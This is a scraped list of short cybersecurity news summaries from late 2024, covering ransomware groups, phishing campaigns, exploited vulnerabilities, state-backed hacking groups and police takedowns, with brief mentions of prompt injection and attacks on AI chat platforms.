LockBit Admins Tease a New Ransomware Version

The LockBit ransomware group is signaling a potential comeback after a challenging period marked by a significant takedown in February 2024. On December 19, LockBitSupp, believed to be an administrator for the group, announced the forthcoming release of "LockBit 4.0," scheduled for February 3, 2025. T

Hackers Exploiting Critical Fortinet EMS Vulnerability to Deploy Remote Access Tools

Threat actors are actively exploiting a recently patched security flaw impacting Fortinet FortiClient EMS in a campaign that installs remote desktop software like AnyDesk and ScreenConnect. The vulnerability is tracked as CVE-2023-48788 (CVSS score: 9.8) and is an SQL injection bug that allows attackers to execute unauthorized code or commands by sending specially crafted data packets.

Top Data Breach Stories and Industry Trends - 2024

In a report from Security Intelligence, it was found that 2024 saw several high-profile data breaches that highlighted critical vulnerabilities across industries. Among the most notable was a breach in the healthcare sector, where attackers targeted a major hospital network, compromising sensitive patient records, insurance information, and medical histories.

Ongoing Phishing Attack Abuses Google Calendar to Bypass Spam Filters

Google Calendar, a widely used scheduling tool with over 500 million users in 41 languages, has become a significant target for cybercriminals exploiting its features to conduct phishing campaigns. Researchers at Check Point uncovered an ongoing campaign affecting over 300 brands, with more than 4,000 phishing emails sent in just four weeks.

Ongoing Phishing Attack Abuses Google Calendar to Bypass Spam Filters

Google Calendar, a widely used scheduling tool with over 500 million users in 41 languages, has become a significant target for cybercriminals exploiting its features to conduct phishing campaigns. Researchers at Check Point uncovered an ongoing campaign affecting over 300 brands, with more than 4,000 phishing emails sent in just four weeks.

Link Trap: GenAI Prompt Injection Attack

The rise of generative AI has introduced advanced capabilities but also new security vulnerabilities, including prompt injection attacks. Traditionally, these attacks exploit how AI processes inputs, often requiring permissions for external interactions.

Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks

Earth Koshchei (APT29/Midnight Blizzard) conducted a large-scale rogue RDP campaign in October 2024, targeting governments, military, think tanks, academic researchers, and Ukrainian entities. The group used spear-phishing emails containing malicious RDP configuration files that redirected victims' connections to rogue servers via 193 RDP relays.

New Glutton Malware Exploits Popular PHP Frameworks Like Laravel and ThinkPHP

QiAnXin XLab researchers have uncovered the use of a new PHP backdoor named Glutton they have observed in a global campaign targeting China, the United States, Cambodia, Pakistan, and South Africa. The malicious activity was discovered in April 2024 and Glutton has been attributed to the Chinese nation-state group APT41 (Winnti) with moderate confidence. To the researchers' surprise, some of these Glutton attacks are part of targeted operations against cybercrime systems.

MUT-1244 Targeting Security Researchers, Red Teamers, and Threat Actors

Threat actor MUT-1244, tracked by DataDog, has been conducting a widespread and multifaceted campaign targeting a range of individuals, including academics, security researchers, pentesters, red teamers, and even other threat actors. The group's primary goal is to steal sensitive data such as AWS access keys, WordPress credentials, private SSH keys, bash history, and other critical system information.

New IOcontrol Malware Used in Critical Infrastructure Attacks

IOCONTROL is a custom-built IoT/OT malware linked to Iranian state-sponsored threat actors, specifically the CyberAv3ngers group. It targets critical infrastructure in Israel and the United States, including routers, IP cameras, firewalls, PLCs, HMIs, and fuel management systems such as Orpak and Gasboy devices.

Microsoft December 2024 Patch Tuesday Fixes 1 Exploited Zero-Day, 71 Flaws

As part of the December Patch Tuesday, Microsoft addressed 71 flaws, including a zero-day vulnerability which is actively being exploited in attacks in the wild. Of the 71 flaws, there were 27 elevation of privilege vulnerabilities, 30 remote code execution vulnerabilities, 7 information disclosure vulnerabilities, 5 denial of service vulnerabilities, and 1 spoofing vulnerabilities.

Mauri Ransomware Exploits Apache ActiveMQ Flaw

AhnLab Security Intelligence Response Center (ASEC) has released a new blog post uncovering threat actors exploiting a critical Apache ActiveMQ vulnerability, CVE-2023-46604, to deploy Mauri ransomware in attacks most recently against Korean systems.

Something to Remember Us By: Device Confiscated by Russian Authorities

According to Citizen Lab, a concerning incident has surfaced where devices confiscated by Russian authorities were returned to their owners with Monokle-type spyware installed. Monokle, a highly advanced spyware tool, is capable of extracting sensitive data such as contact lists, messages, and login credentials, while also intercepting communications and remotely activating device cameras and microphones.

U.S. Offered $10M for Hacker Just Arrested by Russia

Mikhail Matveev, known in the cybercriminal world by the aliases "Wazawaka" and "Boriselcin," has been a prominent figure in several ransomware groups responsible for extorting hundreds of millions of dollars from various sectors, including healthcare, education, government agencies, and private enterprises.

Google Deindexes Chinese Propaganda Network

Google has uncovered a sophisticated pro-China influence network operated by four public relations firms, collectively tracked as "GlassBridge." Active since at least 2022, this network has leveraged deceptive online tactics to spread Chinese state narratives to international audiences.

Zero Day Social Media and One Drive Phish

In November, we observed an increase in spear phishing attempts clicked by our user base using discreet redirect tactics. However, this report will focus on a rise in social media phishing, specifically aimed at Instagram accounts.

Zero Day Social Media and One Drive Phish

In November, we observed an increase in spear phishing attempts clicked by our user base using discreet redirect tactics. However, this report will focus on a rise in social media phishing, specifically aimed at Instagram accounts. Here are some examples and highlights.

Forti-fied? Logging Blind Spot Revealed in FortiClient VPN

While creating an automatic credential validation system for Fortinet VPN, Pentera says it uncovered a bug that actors can exploit to potentially compromise the security of dozens of organizations. Initially, to automate the validation of credentials, Pentera attempted to use clients like OpenConnect to establish a connection, but this approach proved unreliable.

New 'Helldown' Ransomware Variant Expands Attacks to VMware and Linux Systems

Helldown, a ransomware strain derived from the leaked LockBit 3.0 codebase, has been expanding its operations, with researchers recently identifying a Linux variant. This development indicates the group's growing focus on targeting virtualized infrastructures, such as VMware. First documented in August 2024, Helldown has been described as an aggressive ransomware group targeting sectors like IT services, telecommunications, manufacturing, and healthcare.

Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape

Proofpoint has observed a significant rise in the use of the ClickFix social engineering technique, a deceptive method that tricks users into executing malicious PowerShell commands. Initially linked to campaigns by TA571 and the ClearFake threat cluster, the technique has now become a favorite across multiple financially motivated and espionage-focused threat actors.

Sitting Ducks DNS Attacks Put Global Domains at Risk

Over 1 million domains have been identified as potentially vulnerable to "Sitting Ducks" attacks, a cyber threat that exploits DNS misconfigurations, particularly lame delegation. This misconfiguration occurs when domains mistakenly point to incorrect authoritative name servers, allowing attackers to hijack domains.

5G Network AI Models: Threats and Mitigations

Modern communications networks, particularly those driven by 5G technology, are increasingly relying on Artificial Intelligence (AI) to boost performance, improve reliability, and ensure security. As these networks evolve, AI plays an essential role in real-time data processing, predictive maintenance, and optimizing traffic management.

Threats in Space (or rather, on Earth): Internet-exposed GNSS Receivers

Global Navigation Satellite Systems (GNSS), which include the U.S. GPS, Russian GLONASS, European Galileo, Chinese BeiDou, Indian NavIC, and Japanese Quazi-Zenith, serve as critical infrastructure providing essential positioning, navigation, and timing (PNT) services for a wide array of industries such as telecommunications, agriculture, finance, banking, transportation, and mobile communications.

Palo Alto Networks Firewalls, Expedition Under Attack

On November 14, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) confirmed active exploitation of two critical vulnerabilities in Palo Alto Networks' Expedition firewall configuration migration tool: CVE-2024-9463 and CVE-2024-9465. These vulnerabilities, with CVSS scores of 9.9 and 9.3 respectively, pose significant risks to affected systems.

Strela Stealer: Today's Invoice Is Tomorrow's Phish

In November 2024, IBM X-Force observed an ongoing Hive0145 campaign targeting Europe, specifically Spain, Germany, and Ukraine using Strela Stealer malware, a credential-theft tool delivered through highly tailored phishing emails. These emails, posing as legitimate invoice notifications, utilize previously compromised email credentials to blend seamlessly into legitimate email traffic.

GoIssue – The Tool Behind Recent GitHub Phishing Attacks

SlashNext researchers recently uncovered a new phishing tool called GoIssue, which allows threat actors to extract email addresses from GitHub profiles and send bulk emails to users. Advertised on cybercriminal forums, GoIssue is priced at $700 for a custom build or $3,000 for full source code access.

Phishing by Design: Two-Step Attacks Using Microsoft Visio Files

Perception Point researchers published a blog post on November 11, 2024, regarding an observed dramatic increase in two-step phishing attacks targeting hundreds of organizations by leveraging Microsoft Visio's .vsdx files. By weaponizing .vsdx files rarely used in phishing attacks, the adversary exploits user trust in the reputation of Microsoft and concurrently adds a new layer of deception designed to evade detection.

Lazarus Group Uses Extended Attributes for Code Smuggling in macOS

According to a recent report by Group-IB, the Lazarus APT group has started attempting to smuggle code utilizing custom extended attributes, which are metadata associated with files and folders in various file systems. Extended attributes allow users to store additional information beyond standard metadata like file size, timestamps, and permissions.

U.S. Agency Cautions Employees to Limit Phone Use Due to Salt Typhoon Hack of Telco Providers

The US government's Consumer Financial Protection Bureau (CFPB) has advised employees to avoid using cellphones for work after China-linked APT group Salt Typhoon breached major telecom providers. The CFPB, established in 2011 to protect consumers in the financial sector and promote fair, transparent markets, issued a directive urging employees to limit phone use and rely on Microsoft Teams and Cisco WebEx for meetings involving nonpublic data.

New Citrix Zero-Day Vulnerability Allows Remote Code Execution

Researchers at WatchTowr have disclosed new vulnerabilities in Citrix Virtual Apps and Desktops, particularly affecting the Session Recording component, which administrators use to monitor and record user sessions. These security flaws could potentially allow unauthenticated remote code execution, presenting a serious threat to affected systems.

New Ymir Ransomware Partners With RustyStealer in Attacks

Ymir, a relatively new ransomware family, has been observed by researchers at Kaspersky encrypting systems that were previously compromised by RustyStealer, an infostealer malware first documented in 2021. Ymir ransomware initiated operations in July 2024 and is known for its in-memory execution, use of PDF files as ransom notes, and extension configuration options.

New Campaign Uses Remcos RAT to Exploit Victims

Fortinet's FortiGuard Labs recently identified a phishing campaign delivering a new Remcos RAT variant through a malicious Excel document attached to a phishing email. The attack starts with a convincing email that includes the Excel file, disguised as an order form to lure the recipient into opening it.

Dark Web Profile: CosmicBeetle "NoName" Ransomware

CosmicBeetle, also known as NoName, is a ransomware-as-a-service (RaaS) operation that has been active since 2020. This group is known for exploiting known vulnerabilities, such as EternalBlue (CVE-2017-0144), and the Zerologon vulnerability (CVE-2020-1472) to infiltrate systems.

New Android Banking Malware 'ToxicPanda' Targets Users with Fraudulent Money Transfers

Cleafy's Threat Intelligence team witnessed a significant spike in malicious activity utilizing a new Android malware sample in late October 2024. Initially classified as TgToxic malware, this malware sample was further analyzed and although it has similar bot commands with TgToxic, the code differs greatly in that many TgToxic capabilities are absent and some commands act as placeholders for unimplemented modules, leading Cleafy to classify this malware as a new family called ToxicPanda.

GoZone Ransomware Accuses and Threatens Victims

The GoZone ransomware, a new strain identified by SonicWall researchers, targets victims with a relatively low ransom demand of $1,000 in Bitcoin for file decryption. Written in Go, it employs Chacha20 and RSA algorithms to encrypt files, appending a ".d3prU" extension to signal compromise.

Massive PSAUX Ransomware Attack Targets 22,000 CyberPanel Instances

A critical Remote Code Execution vulnerability in CyberPanel exposed over 22,000 instances online, leading to a large-scale PSAUX ransomware attack that took most affected servers offline. This vulnerability affects CyberPanel versions 2.3.6 and likely 2.3.7 and includes three significant flaws: defective authentication, command injection, and a security filter bypass.

Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

This is a sophisticated campaign with a large scope and it utilizes the commonly used Facebook software as an avenue for initial access. The TA has the infrastructure to impersonate ads for essentially any commonly used software. This malware has the capability to evade AV detection. The possibility of legitimate business accounts being utilized to propagate the malware further, highlights the severity of the threat.

ReliaQuest Uncovers New Black Basta Social Engineering Technique

Researchers at ReliaQuest have uncovered a new social engineering technique employed by Black Basta ransomware actors to gain an initial foothold into victim environments. Previously, these actors would overwhelm users with email spam, prompting recipients to create a legitimate help-desk ticket to resolve the issue. From here, Black Basta operators would then contact the end user, posing as the help desk to respond to the ticket. I

Redline, Meta Infostealer Malware Operations Seized by Police

The Dutch National Police, in coordination with the FBI and other international agencies, have dismantled the network infrastructure supporting the Redline and Meta infostealer malware operations in an effort known as "Operation Magnus." This disruption serves as a direct warning to cybercriminals that their data is now in the hands of law enforcement.

LinkedIn Bots and Spear Phishers Target Job Seekers

LinkedIn, Microsoft's professional social network, serves as a vital hub for job recruiters and seekers. Unfortunately, it's also becoming a fertile ground for cybercriminals targeting unsuspecting users. Like other social platforms, LinkedIn is rife with bots that respond to specific keywords or hashtags such as "I was laid off" or "#opentowork."

AWS's Predictable Bucket Names Make Accounts Easier to Crack

In June 2024, Aqua Security discovered a security vulnerability in the AWS Cloud Development Kit (CDK), an open-source tool for building cloud infrastructure. This vulnerability could potentially allow attackers to gain administrative access to a target AWS account, allowing account hijacking for executing malicious code.

Amazon Identified Internet Domains Abused by APT29

Amazon recently seized domains used by APT 29, a Russian state-backed actor, in a mass email phishing campaign targeting government agencies, enterprises, and militaries. The campaign which was initially identified and disclosed by Ukraine's Computer Emergency Team (CERT-UA),

LinkedIn Bots and Spear Phishers Target Job Seekers

LinkedIn, Microsoft's professional social network, serves as a vital hub for job recruiters and seekers. Unfortunately, it's also becoming a fertile ground for cybercriminals targeting unsuspecting users. Like other social platforms, LinkedIn is rife with bots that respond to specific keywords or hashtags such as "I was laid off" or "#opentowork."

Scattered Spider x RansomHub: A New Partnership

In October 2024, a significant cybersecurity event involving a manufacturing firm was analyzed by ReliaQuest. The investigation attributed the breach to a group called "Scattered Spider," a collective of English-speaking cybercriminals connected to the ransomware organization "RansomHub."

Embargo Ransomware: Rock'n'Rust

In June 2024, ESET researchers identified a new ransomware group, Embargo, utilizing a Rust-based toolkit for its operations. The toolkit consists of MDeployer, a loader, and MS4Killer, an EDR killer. Both tools are designed to facilitate the deployment and execution of the Embargo ransomware.

Akira Ransomware Continues to Evolve

A new blog post by Cisco Talos shed light on the activities of Akira ransomware, noting that the group is actively creating new variants of its encryptor and refining its TTPs to adapt to shifts in the threat landscape. In 2023 Akira typically employed a double-extortion tactic where victim data was exfiltrated before encryption.

Threat Actor Abuses Gophish to Deliver New PowerRAT and DcRAT

Cisco Talos recently uncovered a phishing campaign leveraging the open-source Gophish toolkit, executed by an unknown threat actor. The campaign utilizes modular infection chains, either via malicious documents (Maldoc) or HTML files containing JavaScript, which lead to the deployment of two Remote Access Trojans (RATs): PowerRAT, a newly identified PowerShell-based RAT, and DCRAT, a widely recognized malware.

Hackers Advertise Stolen Verizon Push-to-Talk 'Call Logs'

Cybercriminals have compromised a third-party provider linked to Verizon's Push-to-Talk systems, a service used by government agencies, first responders, and enterprises for secure internal communication. This breach, advertised on a Russian-language cybercrime forum, does not impact Verizon's core consumer network but reveals significant vulnerabilities in telecoms' security practices.

Latrodectus Malware Increasingly Used by Cybercriminals

ForcePoint has observed an increase in the use of Latrodectus malware by cybercriminals in attacks targeting the financial, automotive, and healthcare sectors. For its part, Latrodectus is a malware downloader that has been around since October 2023. The strain is believed to be developed by LunarSpider, a threat actor who developed the notorious IceID trojan, which has been used by dozens of malware families for distribution purposes.

Attackers Target Exposed Docker Remote API Servers With perfctl Malware

Attackers are exploiting exposed Docker Remote API servers to deploy the perfctl malware, utilizing a structured attack flow that begins with probing the vulnerable server and ends with payload execution and persistence. The attack starts with the attacker identifying an exposed Docker Remote API server through a ping request. Once the server is located, the attacker creates a Docker container using the ubuntu image.

VMware Fixes Bad Patch for Critical vCenter Server RCE Flaw

VMware has released a new security update for CVE-2024-38812, a critical remote code execution (RCE) vulnerability in VMware vCenter Server that wasn't fully addressed by the initial patch in September 2024. The flaw, with a CVSS score of 9.8, stems from a heap overflow issue in the DCE/RPC protocol, affecting vCenter Server and related products like vSphere and Cloud Foundation. It can be exploited without user interaction through specially crafted network packets.

ESET Partner Breached to Send Data Wipers to Israeli Orgs

Last Friday, ESET announced on X (formerly known as Twitter) that it is aware of a security incident that affected its partner company in Israel. Notably, a phishing campaign initiating on October 8th was observed, where emails branded with ESET's logo were sent from eset[.]co[.]il, a legitimate domain that is operated by ESET's Israel distributor, Comsecure.

macOS HM Surf Vuln Might Already Be Under Exploit by Major Malware Family

Microsoft has urged all macOS users to update their systems due to a vulnerability (CVE-2024-44133, CVSS 5.5) patched in the September macOS Sequoia updates. The flaw may be exploited by the Adloader macOS malware family. It targets Apple's Transparency, Consent, and Control (TCC) protections, potentially allowing unauthorized access to a device's camera, microphone, and location.

ClickFix Tactic: The Phantom Meet

Researchers at Sekoia have shed light on a new social engineering tactic called ClickFix, which involves displaying fake error messages in web browsers to trick users into copying and executing malicious PowerShell code to infect targeted systems. In the last couple of months, ClickFix has been used to distribute Windows and macOS infostealers, botnets, and remote access tools.

macOS Vulnerability Could Expose User Data, Microsoft Warns

Microsoft has identified a vulnerability in macOS, named "HM Surf," that enables attackers to bypass the system's Transparency, Consent, and Control technology, which is responsible for managing user permissions for accessing sensitive data. This flaw, tracked as CVE-2024-44133, allows attackers to gain unauthorized access to user data, including browsing history, camera, microphone, and location.

Exploiting Session Fixation via Stored XSS and Cookie Jar Overflow Attack

The pentester encountered a session fixation vulnerability in a PHP web application, but knew it might not be taken seriously on its own. To demonstrate its severity, they combined it with an existing XSS vulnerability and a lesser-known technique called the Cookie Jar Overflow Attack. This combination allowed them to show how an attacker could bypass security measures and hijack user sessions.

Analysis of the Crypt Ghouls Group: Continuing the Investigation into a Series of Attacks on Russia

In December, a new ransomware group targeting Russian businesses and government agencies was identified, dubbed “Crypt Ghouls.” Investigation revealed connections to other cybercriminal groups through shared tactics, tools, and infrastructure. The group employs a variety of utilities, including Mimikatz and LockBit 3.0 for ransomware attacks, utilizing compromised contractor credentials to gain access via VPN.

North Korea Escalates Fake IT Worker Schemes to Extort Employers

Secureworks Counter Threat Unit researchers have identified evolving tactics in fraudulent employment schemes involving North Korean IT workers, linked to the NICKEL TAPESTRY threat group. These schemes involve North Korean nationals using stolen or falsified identities to secure employment at Western companies, including those in the U.S., UK, and Australia.

RansomHub Overtakes LockBit as Most Prolific Ransomware Group

According to Symantec's new report, Ransomware: Threat Level Remains High in Third Quarter, ransomware continues to be a growing threat in the cyber landscape, with Symantec observing 1,255 ransomware attacks in the third quarter of 2024. One of the biggest developments observed by Symantec in Q3 of 2024 was a decline in LockBit activity, a previously dominant player in the ransomware ecosystem.

Cronus: Ransomware Threatening Bodily Harm

Cronus is a sophisticated ransomware strain developed using .NET technology, first reported by Seqrite. This analysis arose from the discovery of a malicious document presented as a PayPal invoice, which was submitted to VirusTotal. The investigation outlines the ransomware's method of file encryption, its persistence mechanisms, and a detailed examination of its ransom note.

North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware

North Korean threat actor ScarCruft, also known as TA-RedAnt, APT37, and several other aliases, has been linked to the exploitation of a now-patched zero-day vulnerability in Windows, identified as CVE-2024-38178 (CVSS score: 7.5). This flaw, a memory corruption issue in the Windows Scripting Engine, allowed remote code execution when using Microsoft Edge in Internet Explorer Mode. Microsoft patched the vulnerability as part of its August 2024 Patch Tuesday updates.

Fake LockBit, Real Damage: Ransomware Samples Abuse AWS S3 to Steal Data

A newly discovered Golang ransomware variant has been found to abuse Amazon S3's Transfer Acceleration feature to exfiltrate data from victim machines to attacker-controlled S3 buckets. The ransomware samples analyzed contained hardcoded AWS credentials, which were used to create S3 buckets and enable faster data transfers through Amazon's globally distributed CloudFront edge locations.

Iranian Cyber Actors' Brute Force and Credential Access Activity Compromises Critical Infrastructure

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors' use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors.

LLMs Are a New Type of Insider Adversary

Security teams are increasingly recognizing large language models (LLMs) as vital business tools capable of automating various tasks, thereby allowing employees to focus on more strategic functions and potentially providing a competitive advantage.

Tax Extension Malware Campaign: Threat Actors Target GitHub Comment Section to Bypass SEG

Cofense has shared insights on a phishing campaign it detected earlier this year, where actors were observed using GitHub links to bypass email security gateways and distribute malware. These links were generated through the submission of GitHub comments, which can be added to the source code repository and may include but are not limited to proposed changes, more information from a user on an issue, or documentation.

Attackers Deploying Red Teaming Tool for EDR Evasion

Threat actors are exploiting the open-source EDRSilencer tool to bypass endpoint detection and response systems, according to Trend Micro researchers. Originally designed for red teaming, EDRSilencer leverages the Windows Filtering Platform to block EDR communications by identifying and filtering EDR processes, preventing them from sending alerts or telemetry.

Iranian Hackers Now Exploit Windows Flaw to Elevate Privileges

The recent activities of Iranian state-sponsored hacking group APT34, also known as OilRig, have focused on government and critical infrastructure entities in the UAE and Gulf region. Trend Micro researchers identified a new campaign in which OilRig deployed a novel backdoor to target Microsoft Exchange servers for credential theft.

D.C. Memo: 'Cyber Incident' Forces Shutdown of OzarksGo's Linear TV Service

OzarksGo, a fiber ISP based in Fayetteville, Arkansas, experienced a cyber incident on October 7 that specifically targeted the servers responsible for providing linear TV service to approximately 4,500 customers in northwest Arkansas and northeast Oklahoma. Upon discovering the potential issue, the company acted promptly by deactivating the affected equipment and bringing in external experts to assess the situation and mitigate further impact.

Ham Radio Is Alive and Well - And Still a Lifeline in Disasters

Amateur ham radio operators have long served as vital communication links during disasters, providing essential support when conventional systems fail. Despite advancements in technology, these skilled volunteers remain prepared through training and drills, such as the Amateur Radio Emergency Service (ARES) Field Day.

Cybercriminals Are Targeting AI Conversational Platforms

Resecurity has reported a growing trend of attacks on AI conversational platforms, particularly those using Natural Language Processing and Machine Learning to simulate human-like interactions. These platforms, commonly used in industries such as finance, e-commerce, and customer support, enable personalized, automated responses to consumers.

Internet Archive Data Breach Exposes 31 Million Accounts

The Internet Archive, a nonprofit digital library known for providing free access to archived websites and digital materials, has been facing a distributed denial-of-service attack for three consecutive days, severely limiting users' ability to access the site. Alongside this DDoS attack, a data breach was discovered, exposing 31 million user accounts, including email addresses, screen names, and bcrypt-hashed passwords.

MisterioLNK: The Open-Source Builder Behind Malicious Loaders

A new, previously undetected loader builder, dubbed "MisterioLNK," has been identified by Cyble Research and Intelligence Labs (CRIL). This versatile tool, publicly accessible on GitHub, poses a significant threat to security defenses due to its ability to generate loader files that largely evade detection by conventional security systems.

To Deliver Malware, Attackers Use the Phone

There has been a recent increase in actors employing callback phishing to infect unsuspecting victims with malware. Callback phishing, otherwise known as telephone-oriented attack delivery (TOAD), is a hybrid phishing model (a combination of voice and phishing) that aims to take advantage of the trust people often assign to strangers who assume authority over the phone.

New Mamba 2FA Bypass Service Targets Microsoft 365 Accounts

Mamba 2FA is an emerging phishing-as-a-service platform that targets Microsoft 365 accounts through adversary-in-the-middle attacks. It uses highly convincing phishing login pages to steal authentication tokens, bypassing multi-factor authentication protections. Priced at $250 per month, Mamba 2FA is gaining popularity due to its accessibility and effectiveness, positioning it as one of the fastest-growing phishing platforms in the market.

Scammers Hit Florida Hurricane Victims with Fake FEMA Claims, Malware Files

In the wake of Hurricane Helene and the impending arrival of Hurricane Milton on October 9th, 2024, Florida faces another threat: a myriad of cyberattacks targeting vulnerable individuals and organizations. Veriti, a cybersecurity research firm based in Israel, identified three key emerging threats exploiting the chaos and urgency surrounding hurricane relief efforts.

New Generation of Malicious QR Codes Uncovered by Researchers

Summary: Barracuda threat analysts have identified a new wave of QR code phishing attacks, known as "quishing," that employ sophisticated techniques to bypass traditional security measures. These phishing attempts use QR codes generated from text-based ASCII/Unicode characters instead of conventional static images, making them difficult for optical character recognition systems to interpret.

31 New Ransomware Groups Join the Ecosystem in 12 Months

Secureworks' 2024 State of the Threat Report highlights a significant 30% rise in active ransomware groups over the past year, despite extensive law enforcement actions aimed at disrupting these operations. In the last 12 months, 31 new ransomware groups have emerged, shifting the landscape from a few dominant players to a more fragmented ecosystem.

U.S. and Microsoft Seize 107 Russian Domains in Major Cyber Fraud Crackdown

Last week, Microsoft and the U.S. Department of Justice (DOJ) announced that they seized 107 internet domains that were being used by Star Blizzard, a Russian nation-state actor. 66 of these domains were used by Star Blizzard to target over 30 civil society organizations including journalists, think tanks, and non-governmental organizations (NGOs), between January 2023 and August 2024.

Separating the Bee From the Panda: CeranaKeeper Making a Beeline for Thailand

A new China-aligned threat actor, dubbed CeranaKeeper, has been identified targeting governmental institutions in Southeast Asia, primarily Thailand. The group has been active since at least early 2022 and is characterized by its relentless pursuit of data exfiltration. CeranaKeeper leverages a variety of techniques and tools, including custom backdoors, exfiltration tools, and the abuse of legitimate cloud and file-sharing services like DropBox and OneDrive, to achieve its objectives.

Mind the (Air) Gap: GoldenJackal Gooses Government Guardrails

ESET researchers uncovered a sophisticated cyberespionage campaign by the GoldenJackal APT group, targeting governmental and diplomatic entities across Europe and South Asia from 2019 to 2024. The group primarily focused on breaching air-gapped systems—networks isolated from the internet to protect highly sensitive data—using custom tools delivered via USB drives.

Hackers Pose as British Postal Carrier to Deliver Prince Ransomware in Destructive Campaign

A cybersecurity campaign targeting organizations in mid-September, in the U.K. and the U.S., employed Prince Ransomware, a freely available variant advertised on GitHub for educational purposes by developer “SecDbg”. The connection to Prince Ransomware was identified due to the observed sample downloading the same PNG from Imgur, and setting the PNG as the background, exactly as Prince Ransomware does in the configuration example on GitHub.

Python-Based Malware Slithers Into Systems via Legit VS Code

A sophisticated cyberattack targeting organizations worldwide has been uncovered by Cyble Research and Intelligence Labs (CRIL). The threat actor (TA) employed a multi-stage attack, utilizing legitimate tools such as Visual Studio Code (VS Code) and GitHub to gain unauthorized remote access to victims' machines. The attack chain's initial access is achieved through a malicious .LNK file, disguised as a legitimate setup file, which is potentially delivered to victims through spam or phishing emails.

New MedusaLocker Ransomware Variant Deployed by Threat Actor

Researchers at Cisco Talos have uncovered a financially motivated threat actor deploying a new MedusaLocker ransomware variant, dubbed “BabyLockerKZ.” First observed in late 2023, this variant distinguishes itself from the original MedusaLocker by using unique autorun keys and an additional public-private key set stored in the registry. Despite these differences, BabyLockerKZ utilizes the same chat and leak site URLs as its predecessor, marking its first identification as a MedusaLocker variant.

Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign

Check Point Research uncovered a recent mobile malware campaign exclusively targeting cryptocurrency users through a malicious Android app disguised as the legitimate WalletConnect protocol, taking advantage of its trusted name. This fake app, identified by Check Point, employed various evasion techniques including BASE64 encoding and encryption to avoid detection, deceive users, and steal their crypto assets. It achieved high visibility in Google Play Store search results through fake reviews and consistent branding, leading to over 10,000 downloads. Another malware app identified by Check Point exhibits similar features and achieved more than 5,000 downloads. Once the fake app is installed, it checks if the user isn't on a desktop, taking users to a legitimate website if they are, and then drops the MS Drainer and prompts the user to sign several transactions. The information is transmitted to a C2 server and it sends commands to MS Drainer to transfer funds to the attacker's wallet. This campaign is notable because it represents the first instance of a cryptocurrency drainer focusing exclusively on mobile device users. While the exact number of victims is unknown, over 150 users are estimated to have lost funds.

Detecting CUPS Exploits: Critical Security Vulnerabilities in Linux and Unix Systems Allow Remote Co

In a recent development, researchers identified significant security vulnerabilities within the OpenPrinting Common Unix Printing System (CUPS), which is a crucial component in many Linux environments. These vulnerabilities could enable attackers to execute arbitrary code remotely, potentially compromising the integrity of affected systems. Given the widespread use of CUPS in personal and enterprise settings, this poses a substantial threat to printing and document-handling workflows, highlighting the need for immediate attention from cybersecurity professionals.

New Cryptojacking Attack Targets Docker API to Create Malicious Swarm Botnet

A recent discovery by Datadog Security Research has unveiled a new cryptojacking campaign targeting Docker and Kubernetes, two widely used platforms for containerized development. The attackers exploit vulnerable Docker Engine APIs exposed to the internet to deploy a cryptocurrency miner on compromised containers. The campaign then utilizes additional malicious scripts to achieve lateral movement across the network, compromising other Docker hosts, Kubernetes deployments, and even SSH servers.

Police Arrest Four Suspects Linked to LockBit

Law enforcement from 12 countries arrested four suspects tied to the LockBit ransomware gang, including a developer, a bulletproof hosting administrator, and two individuals linked to LockBit activities. These arrests were part of Operation Cronos, a global crackdown led by the UK National Crime Agency (NCA), which began in April 2022. A suspected LockBit developer was arrested in August 2024 at the request of French authorities, while two other individuals were arrested in the UK, one for LockBit affiliation and the other for money laundering. Additionally, Spain arrested a bulletproof hosting service administrator used by LockBit.

Ransomware Attack Forces UMC Health System to Divert Some Patients

Last week, Texas healthcare provider UMC Health System disclosed that it detected unusual activity within its IT systems and took steps to proactively disconnect systems to contain the incident. Due to the outage, medical prescription lists are unavailable at UMC clinics. As such, patients have been advised to bring their prescriptions with them when visiting. As a precaution, UMC decided to temporarily divert incoming emergency and non-emergency patients to nearby health facilities. In an update on Monday, the healthcare giant stated that it will start accepting patients via ambulance. However, a select number of patients will still be diverted until all UMC resources are fully functional. As of writing, the investigation is still ongoing, with UMC working with third parties to determine the full scope of the incident and recover systems as soon as possible.

Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit

A critical XML external entity reference (XXE) vulnerability, tracked as CVE-2024-34102, has been exploited to compromise five percent of Adobe Commerce and Magento stores. This vulnerability, dubbed CosmicSting, has been exploited by malicious actors to gain remote code execution on vulnerable systems. The flaw was patched by Adobe on June 27th, 2024, but widespread exploitation has continued. Sansec research discovered seven different groups running large-scale campaigns utilizing this CosmicSting vulnerability.

Lumma Stealer - Using Steam Workshop as C2

An IT-ISAC member shared some indicators related to Lumma Stealer and it's use of Steam Workshop for C2 communications. Lumma Stealer, a subscription-based malware active since 2022, is believed to be developed by the threat actor "Shamel" under the alias "Lumma." It is promoted on dark web forums and a Telegram channel with over a thousand subscribers, and sold for as little as $250 USD. Lumma Stealer collects system data, sensitive information like cookies, passwords, credit card details, and cryptocurrency wallet data from compromised devices. The malware is typically delivered by users downloading trojanized software or opening malicious emails containing Lumma payloads.

Cloudflare Mitigated New Record-Breaking DDoS Attack of 3.8 Tbps

Cloudflare has shared significant insights regarding a notable increase in the frequency and severity of Distributed Denial of Service (DDoS) attacks, particularly starting from early September. During this period, the company successfully neutralized over 100 hyper-volumetric Layer 3 and Layer 4 DDoS attacks. Many of these incidents surpassed critical benchmarks, with some exceeding 2 billion packets per second (Bpps) and reaching impressive peaks of 3 terabits per second (Tbps). One of the most alarming attacks peaked at an extraordinary 3.8 Tbps, which stands as the largest DDoS attack ever made public by any organization.

Ivanti EPM Vulnerability Exploited in the Wild

